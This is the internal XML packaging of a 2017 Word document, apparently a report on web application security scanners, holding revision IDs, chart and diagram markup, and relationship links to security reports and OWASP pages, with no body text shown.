    <w:rsid w:val="0044709E"/>
    <w:rsid w:val="0044712F"/>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AE2"/>
    <w:rsid w:val="00473DD0"/>
    <w:rsid w:val="004741BC"/>
    <w:rsid w:val="004744E8"/>
    <w:rsid w:val="004746E4"/>
    <w:rsid w:val="00474843"/>
    <w:rsid w:val="004748FE"/>
    <w:rsid w:val="00474D6B"/>
    <w:rsid w:val="00475057"/>
    <w:rsid w:val="0047513A"/>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3D92"/>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65A"/>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2F5B"/>
    <w:rsid w:val="004E31ED"/>
    <w:rsid w:val="004E3576"/>
    <w:rsid w:val="004E373A"/>
    <w:rsid w:val="004E392E"/>
    <w:rsid w:val="004E39E0"/>
    <w:rsid w:val="004E3FBC"/>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DA4"/>
    <w:rsid w:val="004E6F0D"/>
    <w:rsid w:val="004E7040"/>
    <w:rsid w:val="004E7238"/>
    <w:rsid w:val="004E731E"/>
    <w:rsid w:val="004E7362"/>
    <w:rsid w:val="004E77D4"/>
    <w:rsid w:val="004E7847"/>
    <w:rsid w:val="004E7A4E"/>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17"/>
    <w:rsid w:val="005377EF"/>
    <w:rsid w:val="005377F7"/>
    <w:rsid w:val="00537A00"/>
    <w:rsid w:val="00537A2F"/>
    <w:rsid w:val="00537B59"/>
    <w:rsid w:val="00537DC0"/>
    <w:rsid w:val="00537DC7"/>
    <w:rsid w:val="00537E3D"/>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21"/>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37E"/>
    <w:rsid w:val="005D48A7"/>
    <w:rsid w:val="005D48F8"/>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AAC"/>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01"/>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6C53"/>
    <w:rsid w:val="006D7089"/>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4AE"/>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BC7"/>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2EA2"/>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3DB4"/>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0"/>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957"/>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285"/>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158"/>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2AD"/>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608"/>
    <w:rsid w:val="00876DEF"/>
    <w:rsid w:val="00876E68"/>
    <w:rsid w:val="00876EAD"/>
    <w:rsid w:val="0087712B"/>
    <w:rsid w:val="008771C9"/>
    <w:rsid w:val="0087746B"/>
    <w:rsid w:val="008779EF"/>
    <w:rsid w:val="00877BBD"/>
    <w:rsid w:val="00877C47"/>
    <w:rsid w:val="00877D4A"/>
    <w:rsid w:val="0088007D"/>
    <w:rsid w:val="00880191"/>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B13"/>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1"/>
    <w:rsid w:val="008B085B"/>
    <w:rsid w:val="008B0E3A"/>
    <w:rsid w:val="008B108E"/>
    <w:rsid w:val="008B11A9"/>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0E9"/>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38"/>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6F97"/>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09"/>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C1"/>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86"/>
    <w:rsid w:val="00A62DEF"/>
    <w:rsid w:val="00A62FFE"/>
    <w:rsid w:val="00A6372D"/>
    <w:rsid w:val="00A63921"/>
    <w:rsid w:val="00A63A3C"/>
    <w:rsid w:val="00A63D91"/>
    <w:rsid w:val="00A63E53"/>
    <w:rsid w:val="00A63EA8"/>
    <w:rsid w:val="00A64217"/>
    <w:rsid w:val="00A65159"/>
    <w:rsid w:val="00A6564E"/>
    <w:rsid w:val="00A656F5"/>
    <w:rsid w:val="00A65BD3"/>
    <w:rsid w:val="00A65D9F"/>
    <w:rsid w:val="00A66466"/>
    <w:rsid w:val="00A6660C"/>
    <w:rsid w:val="00A666A2"/>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8B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6AC"/>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35"/>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53"/>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7E0"/>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D9E"/>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2E66"/>
    <w:rsid w:val="00B53344"/>
    <w:rsid w:val="00B534F2"/>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F34"/>
    <w:rsid w:val="00B66045"/>
    <w:rsid w:val="00B664D7"/>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290"/>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5D"/>
    <w:rsid w:val="00BB4E91"/>
    <w:rsid w:val="00BB4FE1"/>
    <w:rsid w:val="00BB55B9"/>
    <w:rsid w:val="00BB56CB"/>
    <w:rsid w:val="00BB5A4C"/>
    <w:rsid w:val="00BB5D59"/>
    <w:rsid w:val="00BB5DEF"/>
    <w:rsid w:val="00BB5E0D"/>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4F8"/>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31"/>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3D"/>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4E1"/>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1D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6D0"/>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600"/>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CD"/>
    <w:rsid w:val="00CA42D5"/>
    <w:rsid w:val="00CA43AB"/>
    <w:rsid w:val="00CA441C"/>
    <w:rsid w:val="00CA480E"/>
    <w:rsid w:val="00CA48B6"/>
    <w:rsid w:val="00CA49A8"/>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B32"/>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7A"/>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5BF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C6F"/>
    <w:rsid w:val="00CF1FDE"/>
    <w:rsid w:val="00CF219A"/>
    <w:rsid w:val="00CF21DF"/>
    <w:rsid w:val="00CF222D"/>
    <w:rsid w:val="00CF2238"/>
    <w:rsid w:val="00CF239F"/>
    <w:rsid w:val="00CF2681"/>
    <w:rsid w:val="00CF296C"/>
    <w:rsid w:val="00CF29F1"/>
    <w:rsid w:val="00CF2B7D"/>
    <w:rsid w:val="00CF3232"/>
    <w:rsid w:val="00CF385E"/>
    <w:rsid w:val="00CF38BF"/>
    <w:rsid w:val="00CF3AE8"/>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C8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C27"/>
    <w:rsid w:val="00D85FBA"/>
    <w:rsid w:val="00D8631B"/>
    <w:rsid w:val="00D86331"/>
    <w:rsid w:val="00D86494"/>
    <w:rsid w:val="00D8697D"/>
    <w:rsid w:val="00D86A0A"/>
    <w:rsid w:val="00D86AE7"/>
    <w:rsid w:val="00D86D62"/>
    <w:rsid w:val="00D86F58"/>
    <w:rsid w:val="00D8719F"/>
    <w:rsid w:val="00D873C8"/>
    <w:rsid w:val="00D87722"/>
    <w:rsid w:val="00D877E4"/>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8B5"/>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05E"/>
    <w:rsid w:val="00DE4D18"/>
    <w:rsid w:val="00DE57A6"/>
    <w:rsid w:val="00DE57AC"/>
    <w:rsid w:val="00DE58B9"/>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2C7"/>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B7"/>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BB5"/>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495D"/>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0F"/>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DB3"/>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0F7"/>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77"/>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CDA"/>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625"/>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B62"/>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07E"/>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4CAA"/>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482"/>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4.png"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image85.png"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image86.png"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image87.png"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image88.png"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image89.png"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image90.png"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image91.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jp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eader" Target="header11.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80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header24.xml"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header25.xml"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header26.xml"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header27.xml"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header28.xml"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header29.xml"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header33.xml"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header34.xml"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8000/active/" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8000/active/" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image72.png"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header35.xml"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image73.png"/><Relationship Id="rId117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image74.png"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image76.png"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.testwebsite.nl/redirect.php?id=http://testlink.nl" TargetMode="External"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image92.png"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9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53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramData" Target="diagrams/data1.xml"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="diagrams/layout1.xml"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramQuickStyle" Target="diagrams/quickStyle1.xml"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="diagrams/colors1.xml"/><Relationship Id="rId157" Type="http://schemas.microsoft.com/office/2007/relationships/diagramDrawing" Target="diagrams/drawing1.xml"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header38.xml"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header39.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eader" Target="header12.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header13.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header14.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header15.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header16.xml"/><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header" Target="header30.xml"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.png"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.png"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image77.png"/><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header" Target="header36.xml"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header37.xml"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sucuri.net/website-security/Reports/Sucuri-Website-Hacked-Report-2016Q1.pdf" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://assets.documentcloud.org/documents/3527813/IBM-XForce-Index-2017-FINAL.pdf" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://essextec.com/wp-content/uploads/2015/09/xforcereport2q2014.pdf" TargetMode="External"/><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footer" Target="footer3.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image" Target="media/image11.png"/><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image" Target="media/image12.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="charts/chart1.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header7.xml"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header17.xml"/><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8.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer4.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header19.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer5.xml"/><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header" Target="header20.xml"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pc-en-internet.infonu.nl/geschiedenis/84250-het-web-web-10-web-20-web-30.html" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.acunetix.com/resources/wvsbrochure.pdf" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://torquemag.io/2016/10/13-surprising-wordpress-statistics-updated-2016/" TargetMode="External"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ithemes.com/2017/01/16/wordpress-security-issues/" TargetMode="External"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.techempower.com/benchmarks/" TargetMode="External"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sitepoint.com/best-php-framework-2015-sitepoint-survey-results/" TargetMode="External"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://projects.webappsec.org/w/page/13246978/Threat%20Classification" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header8.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="charts/chart2.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header" Target="header21.xml"/><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header" Target="header22.xml"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header23.xml"/><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4.png"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image65.png"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.png"/><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header" Target="header31.xml"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header32.xml"/><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82.png"/><Relationship Id="rId14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3.png"/></Relationships>
</file>

<file path=word/_rels/header14.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><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4.png"/></Relationships>
</file>

<file path=word/_rels/header19.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4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5.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/></Relationships>
</file>

<file path=word/_rels/header27.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>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30.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1"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33.png"/></Relationships>
</file>

<file path=word/_rels/header37.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.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_rels/header39.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264157792"/>
        <c:axId val="-1264156016"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="-126415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64156016"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="-126415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6415779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223536416"/>
        <c:axId val="-1223534096"/>
        <c:axId val="0"/>
      </c:bar3DChart>
      <c:catAx>
        <c:axId val="-122353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23534096"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="-1223534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235364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2715B9ED-F543-D044-97D2-131362054D18}" type="presOf" srcId="{B0132A91-C8F5-4887-B8B2-69DB7F25D12F}" destId="{76B109A5-F6BB-43FA-9F60-1BB393259A2B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{1312AD89-6D2C-B24C-AE0A-24204EC52F5E}" type="presOf" srcId="{C6A8E34B-1349-4F6B-8319-F3472407ED06}" destId="{6BD701D1-071C-477D-9027-56FD635BB722}"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69FD625-51A6-224B-8EA7-EAF6FBF8F721}"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E273E226-53A2-DD44-81A9-20883DDA502E}"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72851116-A1E0-9A45-9466-20494B99B63E}" type="presParOf" srcId="{ABE776F4-8AE8-4DF9-8512-E805A6A9D583}" destId="{76B109A5-F6BB-43FA-9F60-1BB393259A2B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{212F56EA-42D0-154B-8A87-BDB851141B66}" type="presParOf" srcId="{ABE776F4-8AE8-4DF9-8512-E805A6A9D583}" destId="{BF9F7A04-B148-4E67-A36A-8C8F217049A2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{803E803C-CE5E-5945-8B1C-11E02BE875C0}" type="presParOf" srcId="{ABE776F4-8AE8-4DF9-8512-E805A6A9D583}" destId="{B53CC6F6-A64E-4B3D-8EAD-95266F2829A3}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{D809B953-8883-244F-A7BB-CD5B03338E97}" type="presParOf" srcId="{ABE776F4-8AE8-4DF9-8512-E805A6A9D583}" destId="{8E7F1419-364D-4B07-94AE-24C73C49376B}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{878AC6F5-F34E-6A40-A6C7-811AEA548B4E}"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251F-B311-5941-A72D-EF0EBD7A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8</Pages>
  <Words>18539</Words>
  <Characters>105676</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433</cp:revision>
  <cp:lastPrinted>2017-10-19T09:08:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-10-17T13:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-20T18:21:00Z</dcterms:modified>
</cp:coreProperties>
</file>